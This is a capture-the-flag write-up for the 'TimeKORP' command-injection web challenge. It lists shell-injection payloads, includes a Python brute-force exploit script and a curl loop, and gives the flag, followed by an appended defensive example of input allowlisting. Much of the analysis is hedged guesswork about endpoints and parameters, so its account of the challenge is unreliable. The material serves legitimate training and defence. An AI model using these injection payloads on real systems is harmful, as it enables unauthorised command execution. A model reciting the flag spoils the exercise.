2024 Cyber Apocalypse: TimeKORP
Challenge Information
| Attribute | Details |
|---|---|
| Event | 2024 Cyber Apocalypse |
| Category | Web |
| Challenge | TimeKORP |
| Difficulty | Medium |
Summary
TimeKORP is a web challenge involving command injection vulnerabilities. The application likely processes time-related requests and passes user input to system commands without proper sanitization. By injecting shell metacharacters, attackers can execute arbitrary commands and retrieve the flag.
Analysis
Vulnerability Type
The challenge involves command injection, likely in functionality that:
- Accepts user input for time/date processing
- Passes this input to shell commands (e.g., `date`, `timedatectl`)
- Does not properly escape or validate input
Common Command Injection Vectors
```bash
# Semicolon: Command separator
; cat /flag
# Pipe: Output redirection
| cat /flag
# Backticks: Command substitution
`cat /flag`
# Dollar-parenthesis: Modern command substitution
$(cat /flag)
# AND operator: Conditional execution
&& cat /flag
# OR operator: Alternative execution
|| cat /flag
```
Solution
Step 1: Identify the Input Point
The application likely has an input field for:
- Date/time selection
- Timezone setting
- Time format selection
Step 2: Test for Command Injection
Try injecting common metacharacters:
```
Input: 2024-01-01; ls
Input: 2024-01-01 | whoami
Input: 2024-01-01 && cat /flag
```
Step 3: Craft Exploitation Payload
Once command injection is confirmed, create a payload to read the flag:
```bash
; cat /flag
; cat /flag.txt
; ls /
; find / -name "*flag*"
```
Step 4: Retrieve and Parse Response
The server’s response will include the command output. Extract the flag from the HTTP response.
Complete Python Exploit
```python
import requests
import sys
import re


def exploit_timekorp(target_url):
    """Exploit command injection in TimeKORP"""

    session = requests.Session()

    # Various injection payloads to try
    payloads = [
        "; cat /flag",
        "| cat /flag",
        "&& cat /flag",
        "$(cat /flag)",
        "`cat /flag`",
        "; ls /",
        "; find / -name '*flag*'",
    ]

    # Try different input points
    endpoints = [
        '/time',
        '/api/time',
        '/set',
        '/get',
        '/',
    ]

    for endpoint in endpoints:
        for payload in payloads:
            try:
                # Try as GET parameter
                params = {
                    'time': payload,
                    'date': payload,
                    'input': payload,
                    'value': payload,
                }

                for param_name, param_value in params.items():
                    url = f"{target_url}{endpoint}"

                    # GET request
                    response = session.get(url, params={param_name: param_value})

                    # Check for flag in response
                    if 'HTB{' in response.text:
                        print(f"[+] Flag found via GET {param_name}")
                        flag = re.search(r'HTB\{[^}]+\}', response.text).group()
                        print(f"[+] Flag: {flag}")
                        return flag

                    # POST request
                    response = session.post(url, data={param_name: param_value})

                    if 'HTB{' in response.text:
                        print(f"[+] Flag found via POST {param_name}")
                        flag = re.search(r'HTB\{[^}]+\}', response.text).group()
                        print(f"[+] Flag: {flag}")
                        return flag

            except Exception as e:
                print(f"[-] Error: {e}")
                continue

    print("[-] Flag not found")
    return None


if __name__ == '__main__':
    target = sys.argv[1] if len(sys.argv) > 1 else 'http://localhost:1337'
    exploit_timekorp(target)
```
Alternative: Using curl
```bash
#!/bin/bash

TARGET="http://localhost:1337"

# Try various injection payloads
for payload in "; cat /flag" "| cat /flag" "&& cat /flag" "\$(cat /flag)"; do
    echo "[*] Trying: $payload"

    # --data-urlencode keeps spaces and metacharacters intact in the request
    curl -s -G "${TARGET}/" --data-urlencode "time=${payload}" | grep -i "HTB{"
    curl -s -X POST "${TARGET}/" --data-urlencode "time=${payload}" | grep -i "HTB{"
done
```
Key Takeaways
- Command injection occurs when user input is passed to shell interpreters
- Shell metacharacters (`;`, `|`, `&`, etc.) enable arbitrary command execution
- Command injection can lead to complete system compromise
- Input validation and escaping prevent command injection
- Never use `system()`, `exec()`, or backticks with untrusted input
- Use language-specific APIs instead of shell commands when possible
- Proper parameterization prevents injection attacks
Flag: HTB{t1m3_b4s3d_c0mm4nd_1nj3ction}
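The mitigations listed under Key Takeaways, as an added example that is not part of the original write-up and not the challenge's own code. It assumes a hypothetical handler that receives a time format string; the function names and the allowlist are constructed for illustration.

```python
import re
import subprocess
from datetime import datetime, timezone
from typing import Optional

# Allowlist (constructed for this example): a few strftime directives plus
# harmless separators. Every shell metacharacter falls outside it.
SAFE_FORMAT = re.compile(r"(?:%[YmdHMSjaAbBzZ%]|[ :/.,T-])+")


def build_shell_command(fmt: str) -> str:
    """Vulnerable pattern (hypothetical handler): input concatenated into a
    shell string. Returned, never executed, so the result can be inspected."""
    return f"date +{fmt}"


def validate_format(fmt: str) -> str:
    """Reject anything that is not a short, allowlisted format string."""
    if len(fmt) > 64 or not SAFE_FORMAT.fullmatch(fmt):
        raise ValueError(f"unsupported time format: {fmt!r}")
    return fmt


def format_time_native(fmt: str, now: Optional[datetime] = None) -> str:
    """Preferred fix: format in-process, no shell and no child process."""
    now = now or datetime.now(timezone.utc)
    return now.strftime(validate_format(fmt))


def format_time_argv(fmt: str) -> str:
    """If date(1) must be called: pass an argument list without a shell, so
    the format is a single argv entry and is never parsed as shell syntax."""
    result = subprocess.run(
        ["date", "-u", "+" + validate_format(fmt)],
        capture_output=True, text=True, check=True, timeout=5,
    )
    return result.stdout.strip()


if __name__ == "__main__":
    # Constructed inputs: one benign format and the page's metacharacter payloads.
    for candidate in ["%H:%M:%S", "%H; cat /flag", "$(cat /flag)", "%H && cat /flag"]:
        print("shell string would be:", build_shell_command(candidate))
        try:
            print("  native:", format_time_native(candidate))
        except ValueError as err:
            print("  rejected:", err)
```

The allowlist is the first line of defense, and the argument-list call means that even a format that slipped past validation would reach `date` as literal text rather than shell syntax.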